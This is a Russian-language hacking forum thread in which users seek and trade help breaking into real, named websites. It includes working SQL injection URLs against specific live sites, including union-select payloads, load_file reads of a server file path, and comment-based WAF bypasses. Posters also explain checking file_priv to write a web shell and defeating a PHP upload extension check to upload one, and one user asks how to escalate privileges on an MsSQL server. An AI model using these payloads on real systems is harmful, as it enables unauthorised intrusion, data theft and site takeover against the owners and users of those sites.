Ваши вопросы по уязвимостям.

чтоб проверить на включение file_priv, можно воспользоваться функцией локального чтения файлов, load_file(), или если доступна БД mysql.user, то в ней можно просмотреть на учетную запись сайта file_priv

 

Пропустили php4. Если на сервере установлены дополнительные яп/в application/x-httpd-php прописано нестандартное расширение - можно воспользоваться этим.

Мы можем пройти эту проверку:

PHP:

if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )     SendResults( '202' ) ;

Если напишем в переменную $_GET['Type'] то, что не предусматривает разработчик(Например '!!!'). И соответственно зальём шелл.

 

а можешь показать как ето делать на примере, например тут
http://www.miroboew-kazan.ru/news.php?id=3%27+union+select+1,2,3,4%20,5,6,7--

 

http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,(select+load_file('/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/news.php')),3,4,5,6,7--+
Только у тя прав нету файловых

И вообще, по теме залива шелла через мускульную инъекцию дохрена написано. Не проще почитать всё разом, чтобы усвоить всё сразу? Тебе ж выше в куче постов всё подробно разжевали что и как.

 

што дебе дало знать што прав нету? и што бы я увидел если бы они были?

 

Подними у ся вебсервер, сделай какой-нить простой скрипт с выборкой из базы и принимаемым параметром от юзвера. И собсна потесть. В основном при установке ты будешь под рутом, у которого есть file_priv - там и увидишь что и как.

 

Если прав нету, то ничего не выводится. Если есть - содержимое файла ;-(

зы. разве в пхп можно через echo выводить массив? Но тут может я ошибаюсь...

 

У себя сервер, где ты будешь под рутом, а не на хостинге. Так же убедись, что путь с файлом существует.

 

четыре

 

Тогда уж так:

 

просто я извращенец

 

У меня вопрос по Sql-injection. Есть вроде бы инъекция вот здесь: http://today.od.ua/showphoto/876
С помощью order+by можно узнать количество полей.А дальше с union select запросы не проходят,выдает ошибку,на проверки типа +and+1=1 то же самое. Помогите пожалуйста разобраться с данной проблемой.

 

Помогите плиз

 

как бэ Script for BSQL by Grey

 

Приветствую, есть MsSQL сервер, есть доступ к базе данных(не через инъекцию).
Все бы хорошо, но:

Как можно повысить себе права? Можте кто-то уже делал запрос?
Читал мануалы по мсскл, но не вкурил =(

 

Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263

 

http://www.melonfire.com/community/columns/trog/print.php?id=263%20and%201=2%20/*!unIon*/%20/*!sElEct*/%201,2,3,4,5,6+--+

 

Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)

Code:

http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+

 

Code:

http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,4)--+

 

ты чё КЭП??

смотри внимательно на мой линк. до этого момент я сам разобрался. проблема в +from+information_schema.tables+